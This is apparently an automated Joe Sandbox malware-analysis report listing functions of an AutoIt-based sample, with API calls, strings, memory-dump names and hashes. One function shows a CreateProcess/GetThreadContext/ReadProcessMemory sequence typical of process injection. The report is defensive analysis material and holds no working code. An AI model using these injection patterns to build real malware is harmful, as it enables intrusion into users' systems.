Function 00247F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002482F5
TerminateProcess.KERNEL32(00000000), ref: 002482FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002484DD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: b47b1fc59395a28bb0856ff30e89158a3316b34152fdd398956f86bb16138af4
Instruction ID: 07ad52645397a08235d61d92dc6f2df3cd82e596df8ff1cb02c7208ecc5325bf
Opcode Fuzzy Hash: b47b1fc59395a28bb0856ff30e89158a3316b34152fdd398956f86bb16138af4
Instruction Fuzzy Hash: 3F126A71A283419FC714DF28C484B2EBBE1BF99318F14895DE8898B252DB71ED45CF92

Function 001F5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fb46a30a5ed3cde7e699768cccffc3ebcaaa396b6f4303940c0ebe16947f301
Instruction ID: f00ca6c34c3b736aa01f23866e4d929fa0dc8b3e9ecf73c1ad147ad6c2beb35c
Opcode Fuzzy Hash: 9fb46a30a5ed3cde7e699768cccffc3ebcaaa396b6f4303940c0ebe16947f301
Instruction Fuzzy Hash: DA51C171D00A0E9FCB159FA5C849FBEBFBAAF55310F15005AFB06A7291D7319A02CB61

Function 001C10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C1BF4
Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001C1BFC
Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C1C07
Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C1C12
Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001C1C1A
Part of subcall function 001C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001C1C22

Part of subcall function 001C1B4A: RegisterWindowMessageW.USER32(00000004,?,001C12C4), ref: 001C1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001C136A
OleInitialize.OLE32 ref: 001C1388
CloseHandle.KERNEL32(00000000,00000000), ref: 002024AB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d05605be9e18b19c02c3dc45a8e05daaee92c4539c94f24e5e40392b0c17eec8
Instruction ID: 3f546eab5805ec798f9ba100dc52c97adecc1eec6df0d8d29faaddd35ecdc1cc
Opcode Fuzzy Hash: d05605be9e18b19c02c3dc45a8e05daaee92c4539c94f24e5e40392b0c17eec8
Instruction Fuzzy Hash: 07719AB49213028FD785DF7BB94DA653AE4FBA9344396812FD41AC7261EB308825CF45

Function 0022C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001C3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0022C259
KillTimer.USER32(?,00000001,?,?), ref: 0022C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0022C270

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: bbb1d501b9a6b3fa0edeafd18a08a0b7ffaa3323c2fa3b0123c2fbe47f18adbc
Instruction ID: c5ef4d622bbfb5bb42028fc9405259eb4d093b519a1dac64db5ebf79b05e50ce
Opcode Fuzzy Hash: bbb1d501b9a6b3fa0edeafd18a08a0b7ffaa3323c2fa3b0123c2fbe47f18adbc
Instruction Fuzzy Hash: 6C31C570914354BFEB22CFA4A859BEBBBEC9F16308F10049ED5DA97241C7745A84CB51

Function 001F86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,001F85CC,?,00288CC8,0000000C), ref: 001F8704
GetLastError.KERNEL32(?,001F85CC,?,00288CC8,0000000C), ref: 001F870E
__dosmaperr.LIBCMT ref: 001F8739

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 18021b4a80ecf7371e17c94929ed941ab59ee28d78e4e619084554ae2594111e
Instruction ID: 2b6a35a622feca5a9ec6cbdf0560899e9bd73089de4c825726e7bc3bb5cc12c6
Opcode Fuzzy Hash: 18021b4a80ecf7371e17c94929ed941ab59ee28d78e4e619084554ae2594111e
Instruction Fuzzy Hash: 4B012B33A05E6C2AD7247239784977E678A5B92779F3A0259FB18CB1D2DFB0CC818150

Function 001CDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 001CDB7B
DispatchMessageW.USER32(?), ref: 001CDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001CDB9F
Sleep.KERNEL32(0000000A), ref: 001CDBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00211CC9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 3e710575b431395cfc2f0b0b2a520b83934e9d99cc14c819a0f24416ac245490
Instruction ID: 7b6fe663ae3ebf8ecf29f885d401136b9abe14d69783a5325918cf7bddf5692f
Opcode Fuzzy Hash: 3e710575b431395cfc2f0b0b2a520b83934e9d99cc14c819a0f24416ac245490
Instruction Fuzzy Hash: D3F054305543419BE730CBA1EC49FDA73ECEF55311F604529E609830C0EB309494DB15

Function 00232FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00232CD4,?,?,?,00000004,00000001), ref: 00232FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00232CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00233006
CloseHandle.KERNEL32(00000000,?,00232CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0023300D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8a38b9279ff76c3683be8d4f41e21447711f6659f993fcbca1a540ad78c49dde
Instruction ID: 21aa93c5c3eecc8152f73411a9c0625f5361623195fc9af9703b4a292d8b6f88
Opcode Fuzzy Hash: 8a38b9279ff76c3683be8d4f41e21447711f6659f993fcbca1a540ad78c49dde
Instruction Fuzzy Hash: D3E086366807147BD2302765BC0DF8B3A1CD786B72F204210F719790D056B0160142AC

Function 001D1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001D17F6

Strings

CALL, xrefs: 001D17C6

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 0766b9946b4aba48ba842a7d9b5e0f5892df5ef1706d1ce05c9118bbc2b270a5
Instruction ID: 9dc458ad34bc6b4e70c7e8d5ace4c2ff3ecb1c3911e9a8417fb317517d72ec6c
Opcode Fuzzy Hash: 0766b9946b4aba48ba842a7d9b5e0f5892df5ef1706d1ce05c9118bbc2b270a5
Instruction Fuzzy Hash: C1229A70608201EFC714CF14D484B6ABBF2BFA9314F24895EF4968B3A1D775E995CB82

Function 00236EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00236F6B

Part of subcall function 001C4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00236F5A, 00236F63

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 0b20485b685491db3b751996cc767dcd91eec6769ebf356c7e623f9695b9c8ab
Instruction ID: 15e58382a20f15e2f6947d8449dcaaf6f465bc6a5c3c62a3b249e9a875f3c6c4
Opcode Fuzzy Hash: 0b20485b685491db3b751996cc767dcd91eec6769ebf356c7e623f9695b9c8ab
Instruction Fuzzy Hash: 5AB181712182019FCB14EF24D491E6EB7E5BFB4304F04895DF896972A2EB30ED59CB92

Function 00232557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00232587

Strings

EA06, xrefs: 002325B9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 94ce8386f26e4ac9243eb7ba4d499bebb98fac0fd29dedd5872499dae4460541
Instruction ID: 95994636b274532fc8e9ce8b8529a520cfc3626bb4106c34d010d1b93e768505
Opcode Fuzzy Hash: 94ce8386f26e4ac9243eb7ba4d499bebb98fac0fd29dedd5872499dae4460541
Instruction Fuzzy Hash: 5E01F5B2904258BEDF28C7A8C816EAEBBF89B15301F00455AE152D21C1E5B4E7188B60

Function 001C3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001C3908

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 42eaf64185f0a12267895f8575f29ab9e3427d4a27c0c326203db485746c5b89
Instruction ID: 2712a3784b45b20232cbb78925c3dd9d5c086a7f5150da118a9f7cea3f87bf99
Opcode Fuzzy Hash: 42eaf64185f0a12267895f8575f29ab9e3427d4a27c0c326203db485746c5b89
Instruction Fuzzy Hash: FE31D270504301DFD321DF65E889B9BBBF8FB59308F000A6EF5A983240E771AA54CB96

Function 016843A5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01684BD5
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01684BF9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01684C1B

Memory Dump Source

Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: edb2ce356bdd80cbf446ec76393b60a52a385e3d2681e381a41dcaf5fa82b154
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 6E12CF24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A

Function 001DFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 001DFD1F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: ad66ab9efc7d11e141df65c50833b672092c646e54ddaa3f4330d2faf908f9fc
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: BD311674A00109DBC718CF59D480969F7A2FF49304B2482AAE80ACF751D731EED2DBC0

Function 001C4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E9C
Part of subcall function 001C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001C4EAE
Part of subcall function 001C4E90: FreeLibrary.KERNEL32(00000000,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EFD

Part of subcall function 001C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E62
Part of subcall function 001C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001C4E74
Part of subcall function 001C4E59: FreeLibrary.KERNEL32(00000000,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E87

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: f305552d6d25f7ad635352d916765175ec1ef8b0adcc37797632d06e0b1245cc
Instruction ID: 4f66ee109a09313e8a4216b88a8f1834ffbae58bf5cf255914e8e6f4b55f5f3c
Opcode Fuzzy Hash: f305552d6d25f7ad635352d916765175ec1ef8b0adcc37797632d06e0b1245cc
Instruction Fuzzy Hash: DE112731614305ABDB14EF64DC12FAD77A59F70B10F20842EF442A61D1EF74EA549790

Function 001F8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001F8440

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: f0a870a2b3adfb37c31e23e656bab8998a696a5e4797dd77321b910a79698f4a
Instruction ID: 06d2ab318dd0f1cb38a3b507849b358dec3ba45cc38644dc58ee2fb5cd6d2359
Opcode Fuzzy Hash: f0a870a2b3adfb37c31e23e656bab8998a696a5e4797dd77321b910a79698f4a
Instruction Fuzzy Hash: CE11187590420EAFCB05DF58E941AAE7BF5EF48314F154059F908AB312DB31EA21CBA5

Function 001EE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: f8a4d31194a05f93f207b4a3ebec3a7c69067a3fad9a118b7b60bb8535104a68
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 15F0F432511E5897CB313B6B9C05B6E33D89F76334F100719FA20931D2EB70D8028AA5

Function 001F3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 92ee61bb9246094b25be1c6d0c98b9368376e182b676209b33b023d6e6b22730
Instruction ID: 631b8540c1dcaa8cd36fcfbe8fe3fa525fb97e6037693663d46d708c6fb4220e
Opcode Fuzzy Hash: 92ee61bb9246094b25be1c6d0c98b9368376e182b676209b33b023d6e6b22730
Instruction Fuzzy Hash: 59E0E53110066DA7D62126779D04BBE3648AB827F0F150225BE24925D0DB29DD0191E0

Function 001C4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4F6D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 21deeac49a757ec221d09eaafe1e9fbbf9508b931994f4b856d0c4098d57bc84
Instruction ID: e9fe8b369b57dcfb59768ec8714b829326685e5707e278ac766a8c5fdb72e53d
Opcode Fuzzy Hash: 21deeac49a757ec221d09eaafe1e9fbbf9508b931994f4b856d0c4098d57bc84
Instruction Fuzzy Hash: 65F03071109751CFDB389F68D4A4E16B7E4AF24319320897EE1DA82511C731D844DF50

Function 001C2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C2DC4

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
